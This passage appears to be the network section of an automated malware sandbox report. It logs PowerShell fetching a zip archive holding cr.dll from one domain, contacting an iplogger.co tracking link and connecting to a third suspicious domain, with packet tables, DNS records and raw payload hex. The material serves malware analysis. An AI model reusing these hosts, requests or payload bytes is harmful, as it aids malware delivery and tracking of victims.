Nov 20, 2024 12:39:07.990690947 CET	49785	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:07.990706921 CET	443	49785	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:07.990820885 CET	443	49785	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:07.990878105 CET	49785	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:07.990964890 CET	49785	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:07.990982056 CET	443	49785	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:07.991003036 CET	49785	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:07.991019964 CET	443	49785	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:08.093079090 CET	49797	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:08.093143940 CET	443	49797	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:08.093219042 CET	49797	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:08.093624115 CET	49797	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:08.093641996 CET	443	49797	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:08.559597969 CET	443	49797	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:08.559667110 CET	49797	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:08.560988903 CET	49797	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:08.561006069 CET	443	49797	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:08.561342001 CET	443	49797	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:08.562992096 CET	49797	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:08.563215971 CET	49797	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:08.563250065 CET	443	49797	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:09.081513882 CET	443	49797	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:09.081659079 CET	443	49797	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:09.081768990 CET	49797	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:09.081948996 CET	49797	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:09.081970930 CET	443	49797	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:09.321351051 CET	49805	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:09.321408033 CET	443	49805	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:09.321585894 CET	49805	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:09.321939945 CET	49805	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:09.321959972 CET	443	49805	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:09.791143894 CET	443	49805	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:09.791218042 CET	49805	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:09.792644978 CET	49805	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:09.792660952 CET	443	49805	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:09.792998075 CET	443	49805	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:09.794282913 CET	49805	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:09.794459105 CET	49805	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:09.794486046 CET	443	49805	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:09.794542074 CET	49805	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:09.794549942 CET	443	49805	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:10.403269053 CET	443	49805	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:10.403400898 CET	443	49805	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:10.403450966 CET	49805	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:10.403680086 CET	49805	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:10.403698921 CET	443	49805	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:10.641340971 CET	49816	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:10.641393900 CET	443	49816	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:10.641480923 CET	49816	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:10.641901016 CET	49816	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:10.641916990 CET	443	49816	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:11.111094952 CET	443	49816	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:11.111268997 CET	49816	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:11.114537001 CET	49816	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:11.114572048 CET	443	49816	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:11.114905119 CET	443	49816	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:11.125438929 CET	49816	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:11.125499010 CET	49816	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:11.125544071 CET	443	49816	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:11.125684977 CET	49816	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:11.125699043 CET	443	49816	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:11.654978991 CET	443	49816	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:11.655075073 CET	443	49816	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:11.655158997 CET	49816	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:11.655366898 CET	49816	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:11.655385017 CET	443	49816	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:12.921000004 CET	49833	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:12.921046972 CET	443	49833	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:12.921399117 CET	49833	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:12.921614885 CET	49833	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:12.921626091 CET	443	49833	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:13.386775017 CET	443	49833	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:13.386872053 CET	49833	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:13.388952971 CET	49833	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:13.388967037 CET	443	49833	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:13.389242887 CET	443	49833	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:13.391309977 CET	49833	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:13.391309977 CET	49833	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:13.391347885 CET	443	49833	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:13.771500111 CET	443	49833	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:13.771699905 CET	443	49833	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:13.772383928 CET	49833	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:13.772383928 CET	49833	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:14.086733103 CET	49833	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:14.086777925 CET	443	49833	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:14.338032961 CET	49844	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:14.338078976 CET	443	49844	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:14.338155031 CET	49844	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:14.338668108 CET	49844	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:14.338689089 CET	443	49844	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:14.805624008 CET	443	49844	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:14.805694103 CET	49844	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:14.806912899 CET	49844	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:14.806932926 CET	443	49844	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:14.807198048 CET	443	49844	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:14.808840036 CET	49844	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:14.809351921 CET	49844	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:14.809391975 CET	443	49844	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:14.809525013 CET	49844	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:14.809554100 CET	443	49844	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:14.809743881 CET	49844	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:14.809772015 CET	443	49844	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:14.809905052 CET	49844	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:14.809926033 CET	443	49844	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:14.810291052 CET	49844	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:14.810312986 CET	443	49844	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:14.810419083 CET	49844	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:14.810431957 CET	443	49844	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:15.844116926 CET	443	49844	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:15.844211102 CET	443	49844	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:15.844265938 CET	49844	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:15.847527981 CET	49844	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:15.847548008 CET	443	49844	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:15.961756945 CET	49855	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:15.961798906 CET	443	49855	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:15.961872101 CET	49855	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:15.962320089 CET	49855	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:15.962336063 CET	443	49855	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:16.450429916 CET	443	49855	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:16.450505972 CET	49855	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:16.451946974 CET	49855	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:16.451967001 CET	443	49855	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:16.452249050 CET	443	49855	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:16.453424931 CET	49855	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:16.453447104 CET	49855	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:16.453500032 CET	443	49855	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:16.839658976 CET	443	49855	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:16.839747906 CET	443	49855	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:16.839855909 CET	49855	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:16.840126038 CET	49855	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:16.840133905 CET	443	49855	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:16.840146065 CET	49855	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:16.840150118 CET	443	49855	188.114.96.3	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2024 12:38:56.277467012 CET	62286	53	192.168.2.6	1.1.1.1
Nov 20, 2024 12:38:56.310900927 CET	53	62286	1.1.1.1	192.168.2.6
Nov 20, 2024 12:39:02.005088091 CET	62485	53	192.168.2.6	1.1.1.1
Nov 20, 2024 12:39:02.014887094 CET	53	62485	1.1.1.1	192.168.2.6
Nov 20, 2024 12:39:04.740314007 CET	61829	53	192.168.2.6	1.1.1.1
Nov 20, 2024 12:39:04.810875893 CET	53	61829	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 20, 2024 12:38:56.277467012 CET	192.168.2.6	1.1.1.1	0x461	Standard query (0)	jerseysurffilmfestival.com	A (IP address)	IN (0x0001)	false
Nov 20, 2024 12:39:02.005088091 CET	192.168.2.6	1.1.1.1	0xebed	Standard query (0)	iplogger.co	A (IP address)	IN (0x0001)	false
Nov 20, 2024 12:39:04.740314007 CET	192.168.2.6	1.1.1.1	0x9fac	Standard query (0)	appr0dress.cyou	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 20, 2024 12:38:56.310900927 CET	1.1.1.1	192.168.2.6	0x461	No error (0)	jerseysurffilmfestival.com	185.61.154.28	A (IP address)	IN (0x0001)	false
Nov 20, 2024 12:39:02.014887094 CET	1.1.1.1	192.168.2.6	0xebed	No error (0)	iplogger.co	172.67.167.249	A (IP address)	IN (0x0001)	false
Nov 20, 2024 12:39:02.014887094 CET	1.1.1.1	192.168.2.6	0xebed	No error (0)	iplogger.co	104.21.82.93	A (IP address)	IN (0x0001)	false
Nov 20, 2024 12:39:04.810875893 CET	1.1.1.1	192.168.2.6	0x9fac	No error (0)	appr0dress.cyou	188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 20, 2024 12:39:04.810875893 CET	1.1.1.1	192.168.2.6	0x9fac	No error (0)	appr0dress.cyou	188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

jerseysurffilmfestival.com

iplogger.co

appr0dress.cyou

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49721	185.61.154.28	443	2664	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 11:38:56 UTC	181	OUT	GET /wakena.zip HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: jerseysurffilmfestival.com Connection: Keep-Alive
2024-11-20 11:38:57 UTC	281	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 content-type: application/zip last-modified: Mon, 18 Nov 2024 20:49:44 GMT accept-ranges: bytes content-length: 3437295 date: Wed, 20 Nov 2024 11:38:57 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2024-11-20 11:38:57 UTC	16384	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 65 63 72 59 53 55 5d 76 0a 49 1c 00 00 5c 57 00 06 00 00 00 63 72 2e 64 6c 6c e4 7c 61 70 64 59 79 dd eb 99 5e b6 87 69 56 0d db 4b 64 90 b1 36 23 1c 6d 46 b5 51 5b 4a d0 64 84 d3 01 75 55 bb 2c 62 85 d5 30 32 16 46 0b 9a 45 54 69 17 65 e9 01 b9 a2 81 c6 dd af e8 ce 93 9c 76 a1 4e 94 2a c9 68 bc a2 4a 15 d4 41 4e 29 8b 02 da a5 57 23 56 82 c8 49 03 b2 e9 02 39 91 15 e1 ea c9 08 97 12 ab 40 40 77 2b f7 3b df bd f7 dd d7 ac 93 f8 77 a6 76 f5 ee 7b ef de 73 bf ef dc ef 9c fb d4 6f a6 df f3 fe 9c 45 7f fc e2 ff f3 73 cb 5a b7 f8 4f d4 fa bf ff 49 8a ff 1f f9 a5 af 3c 62 ad 5d fa e3 c7 d7 7d fd 7f fc f8 e0 d8 47 3f de 3a f1 fc c7 3e f2 fc d3 cf b6 7e f8 e9 e7 9e fb 58 a2 f5 43 b7 5a 9f bf fd 5c eb 47 9f 6b ed fb 8d a7 5a 9f fd d8 Data Ascii: PKecrYSU]vI\Wcr.dll\|apdYy^iVKd6#mFQ[JduU,b02FETievN*hJAN)W#VI9@@w+;wv{soEsZOI<b]}G?:>~XCZ\GkZ
2024-11-20 11:38:57 UTC	6016	IN	Data Raw: 69 1a 64 62 79 09 d8 db 06 7b 42 cf 6e 60 09 db d6 12 1a ce 12 1a ce 12 76 9c 25 ec 6a 44 b1 84 2d 80 6d 2b 1b d8 55 db 0d 6b 09 8c a6 a1 2c 81 19 6d 39 4b d8 19 ea bb 5b aa 58 02 cc e1 c7 3b 2c 13 92 59 b1 00 33 6a 75 f9 e9 ef 13 2c c0 dc dd 82 df f5 df 90 66 f9 7b d3 9c 5f 33 d8 0b 32 f5 34 bc bb 65 16 7e 82 a3 bf b9 e7 ee 6e 99 95 75 88 b9 bb a5 9e fa bb 5b e6 24 98 1f b8 8c 52 4f fd dd 2d f4 ad 79 e9 e5 33 42 0a ef 6e 99 4d ed dd 2d 75 fc 5e b8 2e 57 2e aa 36 8c b9 d4 de dd 32 af 62 70 77 b7 cc ca 6f 5a 9f 98 d8 81 0d dc 76 e5 ef 6e 99 07 81 55 f5 eb 67 1d 5f 9b 4d 79 77 0b bb 9f 75 1b 1f dd f9 aa f4 30 43 6f b5 1d d8 08 79 77 4b 55 1b b4 dc dd c2 0b 2a f3 58 c8 cd a6 66 58 e5 5a 4b 05 6b b9 25 1e c4 55 9d 09 77 19 6c 49 50 66 70 bd 88 97 89 50 c7 b8 Data Ascii: idby{Bn`v%jD-m+Uk,m9K[X;,Y3ju,f{_324e~nu[$RO-y3BnM-u^.W.62bpwoZvnUg_Mywu0CoywKU*XfXZKk%UwlIPfpP
2024-11-20 11:38:57 UTC	2176	IN	Data Raw: e6 ed 79 a9 c6 2d 43 0b d3 0c 21 6f 98 90 b7 9d ba d7 50 13 5b aa ee 8d 30 84 69 b6 a5 2c 6d f3 f0 ba aa 7b 2d b0 93 67 11 34 37 42 11 a4 d9 9a 36 8d 32 71 bc 44 ec 15 c0 9e d2 b3 1d a9 bb e0 d4 bd e1 d5 bd e1 d5 bd e5 d5 bd 6d 11 55 dd eb 00 2b 18 45 6f 9b ed 0d a7 6e 46 b3 61 d4 cd 8c d6 bd ba b7 26 e1 bf 55 be b8 6d de 02 7c 4b 3e 49 63 b7 bd 62 64 bf 0c 79 2f a9 bc 73 2a ef 45 95 f7 82 ca 7b 5e e5 fd 89 f2 5e f6 f2 5e c1 d8 2c b9 f2 9d 47 0f 2b 28 e9 1c c2 9e f7 cc f2 d4 12 2e 97 2e e6 10 5a 15 81 c8 db 96 39 30 6c b4 62 e4 9d b3 d0 d9 8a a2 88 bc 97 21 ef 25 e0 ac 10 60 11 fd 31 a0 1f 0c 45 e4 4d 1a 16 50 93 2b 4e de 8b 6c b1 0c 79 2f 01 3e 17 c9 7b 11 8d 16 67 42 92 60 96 51 4c 00 77 38 d5 26 3f 12 12 d4 44 88 35 a2 6f 26 2b 11 3f cb 16 f1 89 fb 5e Data Ascii: y-C!oP[0i,m{-g47B62qDmU+EonFa&Um\|K>Icbdy/s*E{^^^,G+(..Z90lb!%`1EMP+Nly/>{gB`QLw8&?D5o&+?^
2024-11-20 11:38:57 UTC	16384	IN	Data Raw: 82 49 62 4c 0b b1 74 c8 30 ae d3 03 7e 24 24 68 06 13 47 44 df 4d 0e 23 7e 5a 16 f1 8e d7 5e dd 07 01 99 6c c8 64 a3 ea 06 3d c9 91 93 4a d3 c4 67 cb a8 bb ee 9c 17 77 d3 f3 56 a4 ee 1a 22 ae b5 a0 6e 20 7a 78 38 22 af 0a b7 43 a7 fe 35 03 6b a4 b2 68 ef 4b 34 b6 0c 2d 74 33 98 dc 30 26 1f 3a 75 d7 10 13 2d 55 77 23 0c 61 9a b5 94 a5 43 56 d7 55 dd b5 c0 4e 91 41 30 6b 84 20 48 b3 9a 36 8d 3c 71 bc 44 ec 35 c1 9e d2 73 18 a9 bb e9 d4 dd f0 ea 6e 78 75 b7 bc ba 0f 2d a2 aa bb 0e b0 a6 51 f4 a1 29 37 9c ba 69 4d c3 a8 9b 1e d5 bd ba 5b 0f 61 87 67 ea ca 5c 02 bc 4a f6 a5 b1 2b ef 19 d9 57 21 ef 8a ca bb ac f2 2e a9 bc 0b 2a ef 1d 95 f7 3e e5 5d f5 f2 de c3 d8 54 5c f8 ee a0 87 3d 84 74 19 66 ef 78 66 79 ab 82 c7 a5 8b 65 98 36 84 21 72 8e 33 07 86 8d f6 8c Data Ascii: IbLt0~$$hGDM#~Z^ld=JgwV"n zx8"C5khK4-t30&:u-Uw#aCVUNA0k H6<qD5snxu-Q)7iM[ag\J+W!.*>]T\=tfxfye6!r3
2024-11-20 11:38:57 UTC	16384	IN	Data Raw: 71 f2 46 a9 7f 03 75 cd a5 66 93 37 23 1e 03 3c 37 e2 ff 61 f9 61 f4 f7 c7 00 cf 8d f4 18 e0 79 2a 4a 90 67 9d 2d ee 26 bb 23 50 9c 04 9b e6 cc d0 ce 9b 54 2e 6d 7f 81 af 92 87 67 18 a7 0e 69 0e 01 3d 8f 7d 6a 41 2d 46 6f 4c bd eb 57 48 a7 1d 11 af dd 65 9c c0 6f 42 0e de f1 26 cd 42 fb cf d1 0b ea 61 62 34 44 19 46 46 df 86 32 24 5f 87 fe 3f d5 3c 0f fd 7f aa 79 1c fa ff 54 33 1c 22 d0 e5 51 49 4b 52 81 d5 f9 37 f4 22 c8 c5 d6 b3 94 dd 47 8c 7b ef a3 67 d3 20 e6 55 f4 80 f2 57 94 ef 4d f9 0e 76 0c 86 7e 3e b8 1d fa f9 e0 66 e8 e7 83 eb a1 9f 0f fa 1a 1a 0f e8 f7 cb dd d0 cd 07 f7 e8 79 c0 9e bf f4 d1 83 dc 5b 07 62 9c f4 87 2e 5c 58 35 c0 e3 37 70 e4 01 ac df d1 91 6b 3a c2 46 f7 c3 30 1f dc 5a e8 e4 5e 51 64 3e 90 b6 6f 71 55 44 a7 72 52 02 fa a3 41 57 Data Ascii: qFuf7#<7aay*Jg-&#PT.mgi=}jA-FoLWHeoB&Bab4DFF2$_?<yT3"QIKR7"G{g UWMv~>fy[b.\X57pk:F0Z^Qd>oqUDrRAW
2024-11-20 11:38:57 UTC	16384	IN	Data Raw: 50 0d 09 e6 33 16 a0 4e df fc 02 14 7d ab 25 bd fc 81 90 c2 05 a8 fa 9b 5d 80 3a c5 a3 57 45 56 2e 6a 36 8c c6 9b 5d 80 6a a9 18 dc 02 54 5d 9e 8d 3f 31 b1 73 1b b8 ed ca 2f 40 b5 40 60 4d 7d fb 79 8a 8f d5 df b8 00 c5 ee 77 dd c1 ef ee 7e 4d 7a d8 a1 b7 da 0e 6c 84 5c 80 aa 69 83 96 05 28 2e a8 b4 f0 20 57 7f 33 c3 2a 6b 2d 66 b7 c0 7f 72 4b 40 bb 9d e0 4f 01 60 83 c0 4b 7a 05 8e bf c2 ad bf fc fc ef ff bc fd 9b d9 5d c2 38 f3 7f fd f7 4f df ee fd 3c fa d7 bf de cd 6f 99 8b 47 7f b5 4a fc cb dc 9c fb 47 6b f5 3f cc f8 f4 e0 73 06 e3 13 da bb 5c 7a 50 f2 17 c8 ef 1f ad e9 bf 9b cf 9a b3 cf 51 17 11 f0 b8 83 e3 3e 8e db 88 e6 2c 75 ab 4e a7 a9 5b 75 6a a5 6e d5 a9 43 71 b6 59 d6 7f b6 52 bb ea 64 2e cc 03 b9 39 38 a5 55 9e 52 b4 5d d8 c0 a9 6a 10 f3 2c 6a Data Ascii: P3N}%]:WEV.j6]jT]?1s/@@`M}yw~Mzl\i(. W3*k-frK@O`Kz]8O<oGJGk?s\zPQ>,uN[ujnCqYRd.98UR]j,j
2024-11-20 11:38:57 UTC	16331	IN	Data Raw: 3e b3 4a 3c c1 08 35 a8 f3 14 33 70 e2 82 84 87 ce 70 7a 05 8e 9c 23 c3 54 e9 48 99 8e b0 53 4d 65 aa 53 0d 9d d4 04 c5 64 aa 2a 32 d5 19 70 6a 04 a8 60 3c 1a 74 4f 53 4c a6 22 0d 65 c8 ab 66 33 55 85 3d aa c8 54 67 80 3f 0d 32 55 05 9d 2a 53 26 19 63 aa 98 03 80 5b 9c 7a ca 9f 88 04 a5 30 b1 4d f4 ad a8 16 f0 53 d5 88 19 b7 5d a6 3a f1 c8 64 c3 bc 37 2f 99 0a f4 44 e7 56 f6 67 4a 6b 55 95 a9 2a d6 79 e3 6e 7c 5d 0d 32 55 19 ea a9 4e 65 2a 20 3a 78 38 f2 f3 d4 60 ea c4 bf 33 cf 1a a9 2c e8 e3 78 ac 4c d1 42 37 bd c9 a7 ca e4 9a cd 54 65 c4 44 55 32 d5 a9 9f c2 38 a9 0a 4b 35 ee ae 48 a6 2a 7b 76 0a 0c 82 f4 d4 07 41 9c 94 a5 6b e0 89 e5 25 60 ef 0c ec 09 3d b5 20 53 9d d9 4c 75 ea 32 d5 a9 cb 54 55 97 a9 6a 1a 51 32 55 05 60 67 2a 3b d5 54 fb d4 66 2a 5a Data Ascii: >J<53ppz#THSMeSd2pj`<tOSL"ef3U=Tg?2US&c[z0MS]:d7/DVgJkUyn\|]2UNe :x8`3,xLB7TeDU28K5H{vAk%`= SLu2TUjQ2U`g;Tf*Z
2024-11-20 11:38:57 UTC	53	IN	Data Raw: 83 58 67 fc 6a f0 d6 3c 5e 2e 53 4c 23 b4 2a 02 91 67 09 73 31 39 68 d1 58 42 c6 42 27 8b 8a 22 96 b0 00 8e e6 81 b3 48 80 39 cc c7 80 6e 19 8a 58 02 69 98 45 Data Ascii: Xgj<^.SL#*gs19hXBB'"H9nXiE
2024-11-20 11:38:57 UTC	16384	IN	Data Raw: 1d 2f 3a 4b 98 e3 88 05 70 37 0f f8 4c ca 12 e6 30 68 6e 22 24 09 66 01 05 08 70 87 53 6d f1 47 44 82 5a 08 b1 46 f4 7c b4 98 e2 67 c1 22 3e f3 dc af e7 4c 40 26 1b f2 df c0 d5 12 40 4f f4 d5 e9 6b de 14 f5 82 b1 84 39 97 bc a4 1b 9f 2e a4 2c 61 16 65 ba 30 61 09 40 f4 f0 48 44 9e 0c 6c 97 4e f3 9b 0f ac 91 ca 9c bd 2f 25 bc 60 68 61 9a 21 e4 8c 09 79 d1 59 c2 2c 6a 62 41 2d 21 13 96 30 4e 16 94 a5 45 5e 9e 53 4b 98 0d ec e4 58 04 ad 4c 28 82 38 99 d5 a1 a9 4c 1c 2f 29 f6 e6 c1 9e d2 b3 98 b2 84 79 67 09 19 6f 09 19 6f 09 0b de 12 16 2d a2 5a c2 1c c0 e6 8d 0d 2c 9a e3 8c b3 04 46 93 31 96 c0 8c e6 bc 25 2c a4 36 a0 ba 20 fe 1e 1f de e1 6d 42 d2 53 59 e3 3f 7c 2a d0 77 58 80 6c 40 e1 73 7d f9 f7 6a ac 4d f7 cb c3 fd 40 37 a0 1e 07 e9 0d a8 1e 34 f1 e8 ea Data Ascii: /:Kp7L0hn"$fpSmGDZF\|g">L@&@Ok9.,ae0a@HDlN/%`ha!yY,jbA-!0NE^SKXL(8L/)ygoo-Z,F1%,6 mBSY?\|*wXl@s}jM@74
2024-11-20 11:38:57 UTC	16384	IN	Data Raw: c7 ed d0 69 7e d3 c0 1a a9 2c d8 f3 ae 1a ef 0d 2d 4c 33 84 9c 9b 90 1f 27 54 f7 08 35 71 3f f1 ea ce c3 10 a6 d9 bd b2 f4 c8 c3 77 aa ee 51 60 a7 c0 22 68 e7 a1 08 d2 6c a4 4d a3 4c 84 97 88 bd 29 d8 53 7a 1e 27 56 dd 53 51 77 ee d5 9d 7b 75 df 4f 44 dd 8f 16 51 d5 7d 07 b0 a9 51 f7 a3 d9 ce 45 dd 8c 26 37 ea 66 46 77 5e dd f7 93 f0 b4 ca 2a 95 5e e5 25 c0 f7 e4 d6 35 96 ed c1 24 c8 be 0f 79 f7 54 de 5d 95 f7 8d ca bb a3 f2 6e a9 bc 6f 29 ef be 97 f7 00 63 d3 93 f2 6d a1 87 01 4a ba 8b b0 5b 9e 59 9e ea e1 eb ae 8b 79 84 76 86 40 dc 4b 9e 39 30 6c 34 30 f2 ee 5a e8 6c a0 28 4e de 7d c8 bb 07 9c 01 01 6e 38 e6 3d a9 70 1c 1d 15 84 86 0e 6a 72 20 f2 be 61 8b 3e e4 dd 03 7c 37 92 f7 0d 1a dd cc 84 e4 82 e9 a3 98 06 ac e3 1b 66 c0 8f 84 04 b5 11 62 95 e8 9b Data Ascii: i~,-L3'T5q?wQ`"hlML)Sz'VSQw{uODQ}QE&7fFw^*^%5$yT]no)cmJ[Yyv@K90l40Zl(N}n8=pjr a>\|7fb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49756	172.67.167.249	443	2664	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 11:39:02 UTC	162	OUT	GET /1twXC4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: iplogger.co Connection: Keep-Alive
2024-11-20 11:39:03 UTC	1333	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 11:39:02 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: close Set-Cookie: 56258915137263947=3; expires=Thu, 20 Nov 2025 11:39:02 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict Set-Cookie: clhf03028ja=8.46.123.75; expires=Thu, 20 Nov 2025 11:39:02 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict memory: 0.43143463134765625 expires: Wed, 20 Nov 2024 11:39:02 +0000 Cache-Control: no-store, no-cache, must-revalidate strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN 